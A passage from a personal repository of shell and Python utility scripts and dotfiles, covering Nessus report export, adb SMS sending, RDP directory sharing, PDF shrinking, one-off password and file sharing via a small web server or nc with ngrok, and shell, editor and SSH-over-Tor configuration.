179 | $"https://${HOSTADDR}:${HOSTPORT}/scans/${SCANID}/export?limit=2500" -o $TMPDIR/$SCANID.json 180 | 181 | TOKEN=$(cat $TMPDIR/$SCANID.json | jsonlint -f | grep -F '"token"' | awk '{ print $NF }' | tr -d '"') 182 | 183 | if [[ ! -z "$TOKEN" ]] ; then 184 | echo -n "Scan ID: ${SCANID} (token: ${TOKEN}) ... " 185 | 186 | sleep $SLEEPSEC 187 | 188 | ### TODO: test for old versions 189 | #curl -s -k -X $"GET" \ 190 | #-H $"Host: ${HOSTADDR}:${HOSTPORT}" -H $"${UA}" -H $"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H $"Accept-Language: en-US,en;q=0.5" -H $"Accept-Encoding: gzip, deflate" -H $"Referer: https://${HOSTADDR}:${HOSTPORT}/" -H $"Connection: close" -H $"Upgrade-Insecure-Requests: 1" \ 191 | #$"https://${HOSTADDR}:${HOSTPORT}/scans/exports/${TOKEN}/download" -o ${REPORTSDIR}/report_${SCANID}.gz 192 | 193 | curl -s -k -X $"GET" \ 194 | -H $"Host: ${HOSTADDR}:${HOSTPORT}" -H $"${UA}" -H $"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H $"Accept-Language: en-US,en;q=0.5" -H $"Accept-Encoding: gzip, deflate" -H $"Referer: https://${HOSTADDR}:${HOSTPORT}/" -H $"Connection: close" -H $"Upgrade-Insecure-Requests: 1" \ 195 | $"https://${HOSTADDR}:${HOSTPORT}/tokens/${TOKEN}/download" -o ${REPORTSDIR}/report_${SCANID}.gz 196 | 197 | gzip -t ${REPORTSDIR}/report_${SCANID}.gz 2> /dev/null 198 | 199 | if [[ $? -eq 0 ]] ; then 200 | gunzip -q --synchronous ${REPORTSDIR}/report_${SCANID}.gz 201 | 202 | mv ${REPORTSDIR}/report_${SCANID} ${REPORTSDIR}/report_${SCANID}.nessus 203 | else 204 | mv ${REPORTSDIR}/report_${SCANID}.gz ${REPORTSDIR}/report_${SCANID}.nessus 205 | fi 206 | 207 | echo "OK" 208 | fi 209 | done 210 | 211 | COUNT=$(ls -la ${REPORTSDIR}/*.nessus 2> /dev/null | wc -l) 212 | 213 | if [[ $COUNT -eq 0 ]] ; then 214 | echo "The folder seems to be empty, so no reports have been exported." 215 | else 216 | echo 217 | echo "${COUNT} reports have been saved." 218 | fi 219 | 220 | echo 221 | 222 | rm -f $TMPDIR/scans 223 | rm -f $TMPDIR/*.json 224 | fi 225 | 226 | -------------------------------------------------------------------------------- /Utilities/send_sms.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: send_sms.sh 6 | # 7 | # Description: A script that sends a SMS from an Android device connected via 8 | # USB to your PC. It needs ADB to work, and "Developer options" 9 | # must be enabled on your phone. 10 | # 11 | # Usage: ./send_sms.sh '' 12 | # 13 | # 14 | # --TODO-- 15 | # - ??? 16 | # 17 | # 18 | ################################################################################ 19 | 20 | 21 | # VARIABLES -------------------------------------------------------------------- 22 | 23 | NUMBER=$1 24 | MESSAGE=$2 25 | 26 | 27 | # FUNCTIONS -------------------------------------------------------------------- 28 | 29 | command_exists() { 30 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 31 | } 32 | 33 | 34 | # CHECKS ----------------------------------------------------------------------- 35 | 36 | declare -a CMDS=( 37 | "adb" 38 | ); 39 | 40 | for CMD in ${CMDS[@]} ; do 41 | command_exists $CMD 42 | done 43 | 44 | 45 | # MAIN ------------------------------------------------------------------------- 46 | 47 | adb shell service call isms 7 i32 0 s16 "com.android.mms.service" s16 "\"${NUMBER}\"" s16 "null" s16 "\"${MESSAGE}\"" s16 "null" s16 "null" 48 | 49 | -------------------------------------------------------------------------------- /Utilities/share_dir_via_rdp.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: share_dir_via_rdp.sh 6 | # 7 | # Description: A script that maps and shares a local directory to a remote 8 | # Windows machine via RDP. 9 | # 10 | # Usage: ./share_dir_via_rdp.sh [] 11 | # 12 | # 13 | # --TODO-- 14 | # - Handle parameters from command line 15 | # - ??? 16 | # 17 | # 18 | ################################################################################ 19 | 20 | 21 | # VARIABLES -------------------------------------------------------------------- 22 | 23 | LOCAL_DIR=$1 24 | RDP_SERVER=$2 25 | SCRN_RES=$3 26 | THIS=$(basename "$0") 27 | 28 | 29 | # FUNCTIONS -------------------------------------------------------------------- 30 | 31 | command_exists() { 32 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 33 | } 34 | 35 | 36 | # CHECKS ----------------------------------------------------------------------- 37 | 38 | declare -a CMDS=( 39 | "rdesktop" 40 | ); 41 | 42 | for CMD in ${CMDS[@]} ; do 43 | command_exists $CMD 44 | done 45 | 46 | 47 | # MAIN ------------------------------------------------------------------------- 48 | 49 | if (( $# < 2 )) ; then 50 | echo "Usage: $THIS []" 51 | echo 52 | echo " - Local directory to share on remote machine" 53 | echo " - Remote RDP target machine" 54 | 55 | exit 1 56 | fi 57 | 58 | rdesktop -r disk:share="${LOCAL_DIR}" -g "${SCRN_RES}" "${RDP_SERVER}" 59 | 60 | -------------------------------------------------------------------------------- /Utilities/shrinkpdf.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | # http://www.alfredklomp.com/programming/shrinkpdf 4 | # Licensed under the 3-clause BSD license: 5 | # 6 | # Copyright (c) 2014-2019, Alfred Klomp 7 | # All rights reserved. 8 | # 9 | # Redistribution and use in source and binary forms, with or without 10 | # modification, are permitted provided that the following conditions are met: 11 | # 1. Redistributions of source code must retain the above copyright notice, 12 | # this list of conditions and the following disclaimer. 13 | # 2. Redistributions in binary form must reproduce the above copyright notice, 14 | # this list of conditions and the following disclaimer in the documentation 15 | # and/or other materials provided with the distribution. 16 | # 3. Neither the name of the copyright holder nor the names of its contributors 17 | # may be used to endorse or promote products derived from this software 18 | # without specific prior written permission. 19 | # 20 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 23 | # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE 24 | # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 25 | # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 26 | # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 27 | # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 28 | # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 29 | # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 30 | # POSSIBILITY OF SUCH DAMAGE. 31 | 32 | # 33 | # Modified by Vivek Gite to suit my needs 34 | # 35 | shrink () 36 | { 37 | gs \ 38 | -q -dNOPAUSE -dBATCH -dSAFER \ 39 | -sDEVICE=pdfwrite \ 40 | -dCompatibilityLevel=1.3 \ 41 | -dPDFSETTINGS=/screen \ 42 | -dEmbedAllFonts=true \ 43 | -dSubsetFonts=true \ 44 | -dAutoRotatePages=/None \ 45 | -dColorImageDownsampleType=/Bicubic \ 46 | -dColorImageResolution=$3 \ 47 | -dGrayImageDownsampleType=/Bicubic \ 48 | -dGrayImageResolution=$3 \ 49 | -dMonoImageDownsampleType=/Subsample \ 50 | -dMonoImageResolution=$3 \ 51 | -sOutputFile="$2" \ 52 | "$1" 53 | } 54 | 55 | check_smaller () 56 | { 57 | # If $1 and $2 are regular files, we can compare file sizes to 58 | # see if we succeeded in shrinking. If not, we copy $1 over $2: 59 | if [ ! -f "$1" -o ! -f "$2" ]; then 60 | return 0; 61 | fi 62 | ISIZE="$(echo $(wc -c "$1") | cut -f1 -d\ )" 63 | OSIZE="$(echo $(wc -c "$2") | cut -f1 -d\ )" 64 | if [ "$ISIZE" -lt "$OSIZE" ]; then 65 | echo "Input smaller than output, doing straight copy" >&2 66 | cp "$1" "$2" 67 | fi 68 | } 69 | 70 | usage () 71 | { 72 | echo "Reduces PDF filesize by lossy recompressing with Ghostscript." 73 | echo "Not guaranteed to succeed, but usually works." 74 | echo " Usage: $1 infile [outfile] [resolution_in_dpi]" 75 | } 76 | 77 | IFILE="$1" 78 | 79 | # Need an input file: 80 | if [ -z "$IFILE" ]; then 81 | usage "$0" 82 | exit 1 83 | fi 84 | 85 | # Output filename defaults to "-" (stdout) unless given: 86 | if [ ! -z "$2" ]; then 87 | OFILE="$2" 88 | else 89 | OFILE="-" 90 | fi 91 | 92 | # Output resolution defaults to 72 unless given: 93 | if [ ! -z "$3" ]; then 94 | res="$3" 95 | else 96 | res="90" 97 | fi 98 | 99 | shrink "$IFILE" "$OFILE" "$res" || exit $? 100 | 101 | check_smaller "$IFILE" "$OFILE" 102 | -------------------------------------------------------------------------------- /Utilities/snippets.txt: -------------------------------------------------------------------------------- 1 | # remove all binary non-printable characters from a text file 2 | tr -dc '[:print:]\n\r' < in.file > out.file 3 | 4 | 5 | 6 | # URL-encode any string very quickly 7 | echo 'https://duckduckgo.com/?q=url+encode&t=h_&ia=web' | jq -sRr @uri 8 | 9 | 10 | 11 | # URL-decode any string very quickly 12 | alias urldecode='sed "s@+@ @g;s@%@\\\\x@g" | xargs -0 printf "%b"' 13 | echo 'https%3A%2F%2Fduckduckgo.com%2F%3Fq%3Durl%2Bencode%26t%3Dh_%26ia%3Dweb%0A' | urldecode 14 | 15 | 16 | 17 | # extract files from binary file with BinWalk 18 | binwalk -I -k -z -M -e -v file.bin 19 | 20 | 21 | 22 | # convert a TXT file to a PDF file 23 | vim example.txt -c "hardcopy > example.ps | q" ; ps2pdf example.ps 24 | 25 | 26 | 27 | # read complete lines with spaces in a loop from a text file 28 | while read STR ; do echo "$STR" ; done < example.txt 29 | 30 | 31 | 32 | # search strings with an exact numbers of characters only (eg: hashes) 33 | cat example.txt | grep -E '^.{32}$' 34 | 35 | 36 | 37 | # print a text line until a specific word is found (that word is excluded from the output) 38 | STR='Lorem Ipsum is simply dummy text of the printing and typesetting industry.' 39 | echo ${STR%%"and"*} 40 | Lorem Ipsum is simply dummy text of the printing 41 | 42 | 43 | 44 | # run Google Chrome with a specific SOCKS5 proxy server 45 | google-chrome-stable --proxy-server="socks5://127.0.0.1:3128" --host-resolver-rules="MAP * ~NOTFOUND , EXCLUDE 127.0.0.1" 46 | -------------------------------------------------------------------------------- /Utilities/xfce4-root-terminal.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Since XFCE Terminal doesn't support profiles like Gnome Terminal, this is a simple workaround to start a root terminal. 4 | 5 | xhost si:localuser:root 6 | pkexec --user root xfce4-terminal --disable-server --display=:0.0 7 | -------------------------------------------------------------------------------- /Web/SharePwd.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # 4 | # SharePwd.py 5 | # ----------- 6 | # A simple Python script that, given a customer name and password, runs a 7 | # minimal web server that serves a unique URL consisting in a page with the 8 | # given password. 9 | # This may be useful when somebody needs to share a password with someone else. 10 | # As soon as the recipient reads the password, you can kill the process (or the 11 | # process kills itself if the user clicks on "OK, I've read the password"). 12 | # This is not intended to be a SECURE way to share passwords, it just aims to be 13 | # fast and straightforward. 14 | # 15 | # Coded by: Riccardo Mollo (riccardomollo84@gmail.com) 16 | # 17 | 18 | import binascii 19 | import hashlib 20 | import html 21 | import http.server 22 | import random 23 | import requests 24 | import secrets 25 | import socketserver 26 | import sys 27 | 28 | from datetime import datetime 29 | from http.server import BaseHTTPRequestHandler, HTTPServer 30 | from random import randint, seed 31 | 32 | class HTTPHandler(BaseHTTPRequestHandler): 33 | def __init__(self, password, pwd_hash): 34 | self.password = password 35 | self.pwd_hash = pwd_hash 36 | 37 | def __call__(self, *args): 38 | super().__init__(*args) 39 | 40 | def do_GET(self): 41 | if (self.path[1:] == self.pwd_hash): 42 | data = get_data(self.password) 43 | 44 | self.send_response(200) 45 | self.send_header('Content-type', 'text/html') 46 | self.end_headers() 47 | self.wfile.write(data.encode()) 48 | elif (self.path[1:] == self.pwd_hash + '?ivereadthepwd=OK%2C+I%27ve+read+the+password'): 49 | self.send_response(200) 50 | self.send_header('Content-type', 'text/html') 51 | self.end_headers() 52 | self.wfile.write('Goodbye!'.encode()) 53 | 54 | print('Customer read the password.') 55 | 56 | exit(0) 57 | 58 | return 59 | 60 | def get_data(password): 61 | data = """ 62 | 63 | 64 | 65 | 66 | 105 | 106 | 107 |
""" + html.escape(password) + """
108 |
109 | 110 |
111 | 112 | 113 | """ 114 | 115 | return data 116 | 117 | def get_hash(password, salt): 118 | if type(salt) is not bytes: 119 | salt = salt.encode('utf-8') 120 | 121 | hmac = hashlib.pbkdf2_hmac('sha256', password.encode('utf-8'), salt, 10000) 122 | pwd_hash = binascii.hexlify(hmac) 123 | 124 | return pwd_hash.decode() 125 | 126 | def main(argv): 127 | now = int(datetime.utcnow().timestamp()) 128 | secret = secrets.SystemRandom() 129 | port = secret.randint(16383, 65535) 130 | customer = argv[0] 131 | password = argv[1] 132 | salt = str(secret.randint(port, port * now)) 133 | pwd_hash = get_hash(password, salt) 134 | 135 | try: 136 | handler = HTTPHandler(password, pwd_hash) 137 | httpd = HTTPServer(('', port), handler) 138 | 139 | public_ip = requests.get('https://checkip.amazonaws.com').text.strip() 140 | url = 'http://' + public_ip + ':' + str(port) + '/' + pwd_hash 141 | 142 | print('Customer: ' + customer) 143 | print('Address: ' + url) 144 | 145 | httpd.serve_forever() 146 | except KeyboardInterrupt: 147 | pass 148 | except OSError as ex: 149 | print(ex) 150 | 151 | if __name__ == '__main__': 152 | if len(sys.argv) == 3: 153 | main(sys.argv[1:]) 154 | else: 155 | print("Usage: ./sharepwd.py ", file = sys.stderr) 156 | exit(1) 157 | -------------------------------------------------------------------------------- /Web/extract_links.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: extract_links.sh 6 | # 7 | # Description: A script that extracts all the web links from the HTML page 8 | # source of a given website. 9 | # 10 | # Usage: ./extract_links.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | URL=$1 23 | HTML=/tmp/.page.$RANDOM.html 24 | 25 | # FUNCTIONS -------------------------------------------------------------------- 26 | 27 | command_exists() { 28 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 29 | } 30 | 31 | 32 | # CHECKS ----------------------------------------------------------------------- 33 | 34 | declare -a CMDS=( 35 | "curl" 36 | "lynx" 37 | ); 38 | 39 | for CMD in ${CMDS[@]} ; do 40 | command_exists $CMD 41 | done 42 | 43 | 44 | # MAIN ------------------------------------------------------------------------- 45 | 46 | if [[ -z "${URL}" ]] ; then 47 | echo "Error! not specified." 48 | 49 | exit 1 50 | fi 51 | 52 | curl -s -k ${URL} -o ${HTML} 53 | lynx -dump -hiddenlinks=listonly ${HTML} | grep -vF 'file://' | grep "^\ .[0-9]*\.\ http" | awk '{ print $2 }' | sort -u 54 | rm -f ${HTML} 55 | 56 | -------------------------------------------------------------------------------- /Web/share_file.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: share_file.sh 6 | # 7 | # Description: A script that lets a user share just *one* specific file to 8 | # somebody else by just sending him a simple URL. 9 | # No path/subdirectory is present in the URL, so the file name is 10 | # never mentioned. However, when the recipient will download the 11 | # file, it will be saved with its original name. 12 | # This tool makes use of NGROK (https://ngrok.com/). 13 | # 14 | # NOTE: please remember to kill the "nc" and "ngrok" processes as 15 | # soon as the file has been downloaded. 16 | # 17 | # Usage: ./share_file.sh 18 | # 19 | # 20 | # --TODO-- 21 | # - handle processes' kills when the file is downloaded 22 | # 23 | # 24 | ################################################################################ 25 | 26 | 27 | # VARIABLES -------------------------------------------------------------------- 28 | 29 | PORT=31337 # port on localhost that NetCat will bind to 30 | WAIT=3 # seconds to wait before asking NGROK the public URL 31 | 32 | 33 | # FUNCTIONS -------------------------------------------------------------------- 34 | 35 | command_exists() { 36 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 37 | } 38 | 39 | 40 | # CHECKS ----------------------------------------------------------------------- 41 | 42 | declare -a CMDS=( 43 | "curl" 44 | "jq" 45 | "nc" 46 | "ngrok" 47 | ); 48 | 49 | for CMD in ${CMDS[@]} ; do 50 | command_exists $CMD 51 | done 52 | 53 | 54 | # MAIN ------------------------------------------------------------------------- 55 | 56 | 57 | if [[ $# -ne 1 ]] ; then 58 | echo "Usage: ./share_file.sh " 59 | 60 | exit 1 61 | fi 62 | 63 | FILE=$1 64 | 65 | if [[ ! -f ${FILE} ]] ; then 66 | echo "Error! File not found: ${FILE}" 67 | 68 | exit 1 69 | fi 70 | 71 | CDFN=$(basename ${FILE}) 72 | SIZE=$(wc -c ${FILE} | awk '{ print $1 }') 73 | bold='\033[1m' 74 | normal='\033[0m' 75 | 76 | echo "Sharing file \"${FILE}\" (size in bytes: ${SIZE})..." 77 | 78 | { echo -ne "HTTP/1.0 200 OK\r\nContent-Disposition: attachment; filename=\"${CDFN}\"\r\nContent-Length: ${SIZE}\r\n\r\n"; cat ${FILE}; } | nc -n -l ${PORT} >/dev/null 2>&1 & 79 | 80 | echo "Launching NGROK for \"http://127.0.0.1:${PORT}/\"..." 81 | 82 | nohup ngrok http "http://127.0.0.1:${PORT}/" >/dev/null 2>&1 & 83 | sleep ${WAIT} 84 | 85 | PURL=$(curl --silent http://127.0.0.1:4040/api/tunnels | jq -r --unbuffered '.tunnels[0].public_url') 86 | 87 | echo 88 | echo -e "**** Public URL: ${bold}${PURL}${normal} ****" 89 | echo 90 | echo "Now you can download \"${CDFN}\" with a browser or with one of the following commands:" 91 | echo "$ wget --content-disposition ${PURL}" 92 | echo "$ curl -JLO ${PURL}" 93 | echo -------------------------------------------------------------------------------- /config_files/.bashrc: -------------------------------------------------------------------------------- 1 | # Source global definitions 2 | if [ -f /etc/bashrc ]; then 3 | . /etc/bashrc 4 | fi 5 | 6 | # enable color support of ls and also add handy aliases 7 | if [ -x /usr/bin/dircolors ]; then 8 | test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)" 9 | 10 | alias ls='ls --color=auto' 11 | #alias dir='dir --color=auto' 12 | #alias vdir='vdir --color=auto' 13 | alias grep='grep --color=auto -T' 14 | #alias fgrep='fgrep --color=auto' 15 | #alias egrep='egrep --color=auto' 16 | fi 17 | 18 | # some more ls aliases 19 | alias ll='ls -l' 20 | alias la='ls -A' 21 | alias l='ls -CF' 22 | alias lsd="ls -ad */" 23 | alias du="du --apparent-size" 24 | 25 | ################################################################################ 26 | 27 | ### function to upload files via transfer.sh 28 | transfer() { 29 | curl --progress-bar --upload-file "$1" https://transfer.sh/$(basename "$1") | tee /dev/null; 30 | #wget -t 1 -qO - --method=PUT --body-file="$1" --header="Content-Type: $(file -b --mime-type "$1")" https://transfer.sh/$(basename "$1"); 31 | echo 32 | } 33 | 34 | #### custom settings 35 | export HISTTIMEFORMAT='%F %T ' 36 | export PAGER=less 37 | export QT_QPA_PLATFORMTHEME=gtk2 38 | 39 | #### custom aliases 40 | alias dmesg="dmesg --color" 41 | alias bd=". bd -si" 42 | alias vi="nvim" 43 | alias vim="nvim" 44 | alias lx="exa -bghHaliS" 45 | alias date="date +'%a %d %h %Y %T'" 46 | alias transfer=transfer 47 | 48 | ### custom FireFox profiles 49 | alias firefox_burpsuite="firefox -P 'BurpSuite'" 50 | alias firefox_tor="firefox -P 'Tor'" 51 | 52 | ### custom library paths 53 | export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/opt/oracle/instantclient 54 | 55 | ### custom binary paths 56 | export GOPATH=~/go 57 | export CARGOPATH=~/.cargo 58 | export ORACLEPATH=$LD_LIBRARY_PATH:/opt/mssql-tools/bin 59 | export PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin:${ORACLEPATH}:${GOPATH}/bin:${CARGOPATH}/bin: 60 | 61 | ### only load LiquidPrompt in interactive shells, not from a script or from scp 62 | echo $- | grep -q i 2>/dev/null && . /usr/share/liquidprompt/liquidprompt 63 | -------------------------------------------------------------------------------- /config_files/.bashrc_freebsd: -------------------------------------------------------------------------------- 1 | alias grep='grep --color=auto' 2 | alias ls='ls --color' 3 | alias ll='ls -l' 4 | alias la='ls -A' 5 | alias l='ls -CF' 6 | alias du='du -A' 7 | alias free='freecolor -t -m -o' 8 | alias watch='gnu-watch' 9 | 10 | export HISTTIMEFORMAT='%F %T ' 11 | export PAGER=less 12 | export LC_ALL=en_US.UTF-8 13 | export LANG=en_US.UTF-8 14 | 15 | [[ $PS1 && -f /usr/local/share/bash-completion/bash_completion.sh ]] && source /usr/local/share/bash-completion/bash_completion.sh 16 | 17 | [[ $- = *i* ]] && source /usr/local/src/GIT/liquidprompt/liquidprompt 18 | -------------------------------------------------------------------------------- /config_files/.config/sublime-text-3/Packages/User/Preferences.sublime-settings: -------------------------------------------------------------------------------- 1 | { 2 | "color_scheme": "Packages/Color Scheme - Default/Monokai.sublime-color-scheme", 3 | "font_size": 8, 4 | "theme": "Default.sublime-theme", 5 | "translate_tabs_to_spaces": true 6 | } 7 | -------------------------------------------------------------------------------- /config_files/.gcm/gcm.conf: -------------------------------------------------------------------------------- 1 | [options] 2 | word-separators = -A-Za-z0-9,./?%&#:_=+@~ 3 | buffer-lines = 50000 4 | startup-local = False 5 | confirm-exit = True 6 | font-color = 7 | back-color = 8 | transparency = 0 9 | paste-right-click = True 10 | confirm-close-tab = False 11 | check-updates = True 12 | font = monospace 13 | donate = True 14 | auto-copy-selection = False 15 | log-path = /home/user 16 | version = 1 17 | auto-close-tab = 0 18 | 19 | [window] 20 | collapsed-folders = 21 | left-panel-width = 229 22 | window-width = 1920 23 | window-height = 1047 24 | show-panel = True 25 | show-toolbar = True 26 | 27 | [shortcuts] 28 | console_next = CTRL+SHIFT+RIGHT 29 | console_2 = F2 30 | console_3 = F3 31 | console_4 = F4 32 | console_5 = F5 33 | find = CTRL+F 34 | console_1 = F1 35 | console_8 = F8 36 | console_9 = F9 37 | console_7 = F7 38 | reset = CTRL+SHIFT+U 39 | console_close = CTRL+SHIFT+W 40 | paste = CTRL+SHIFT+V 41 | console_reconnect = CTRL+N 42 | console_6 = F6 43 | save = CTRL+S 44 | console_previous = CTRL+SHIFT+LEFT 45 | copy = CTRL+SHIFT+C 46 | copy_all = CTRL+SHIFT+A 47 | connect = CTRL+RETURN 48 | find_back = SHIFT+F3 49 | -------------------------------------------------------------------------------- /config_files/.nanorc: -------------------------------------------------------------------------------- 1 | set smooth 2 | set autoindent 3 | set casesensitive 4 | set historylog 5 | set morespace 6 | set nohelp 7 | set nowrap 8 | set tabsize 4 9 | set tabstospaces 10 | set mouse 11 | 12 | include "/usr/share/nano/nanorc.nanorc" 13 | include "/usr/share/nano/c.nanorc" 14 | include "/usr/share/nano/html.nanorc" 15 | include "/usr/share/nano/tex.nanorc" 16 | include "/usr/share/nano/mutt.nanorc" 17 | include "/usr/share/nano/patch.nanorc" 18 | include "/usr/share/nano/man.nanorc" 19 | include "/usr/share/nano/groff.nanorc" 20 | include "/usr/share/nano/perl.nanorc" 21 | include "/usr/share/nano/python.nanorc" 22 | include "/usr/share/nano/ruby.nanorc" 23 | include "/usr/share/nano/java.nanorc" 24 | include "/usr/share/nano/asm.nanorc" 25 | include "/usr/share/nano/sh.nanorc" 26 | include "/usr/share/nano/pov.nanorc" 27 | -------------------------------------------------------------------------------- /config_files/.ssh/config: -------------------------------------------------------------------------------- 1 | # Config file to use SSH via TOR for a specific connection 2 | # 3 | # Alternative: 4 | # torify ssh username@example.com 5 | 6 | Host exampleserver 7 | HostName example.com 8 | User username 9 | CheckHostIP no 10 | Compression yes 11 | Protocol 2 12 | ProxyCommand connect -4 -S localhost:9050 $(tor-resolve %h localhost:9050) %p 13 | -------------------------------------------------------------------------------- /config_files/.tmux.conf: -------------------------------------------------------------------------------- 1 | set -g mouse on 2 | set -g mouse-select-window on 3 | set -g mouse-select-pane on 4 | set -g mouse-resize-pane on 5 | setw -g mouse on 6 | -------------------------------------------------------------------------------- /config_files/.vimrc: -------------------------------------------------------------------------------- 1 | syntax on 2 | colorscheme delek 3 | set colorcolumn=80 4 | set guicursor=n-v-c:block-Cursor/lCursor-blinkon0,i-ci:ver25-Cursor/lCursor,r-cr:hor20-Cursor/lCursor 5 | autocmd! bufwritepost .vimrc source % 6 | set number 7 | set ruler 8 | set modelines=0 9 | set encoding=utf-8 10 | -------------------------------------------------------------------------------- /config_files/.xinitrc: -------------------------------------------------------------------------------- 1 | # make QT5 apps have a GTK look (useful when using MATE or GNOME Shell) 2 | export QT_QPA_PLATFORMTHEME=gtk2 3 | -------------------------------------------------------------------------------- /config_files/.xprofile: -------------------------------------------------------------------------------- 1 | if [ -x /usr/bin/numlockx ] ; then 2 | /usr/bin/numlockx on 3 | fi 4 | --------------------------------------------------------------------------------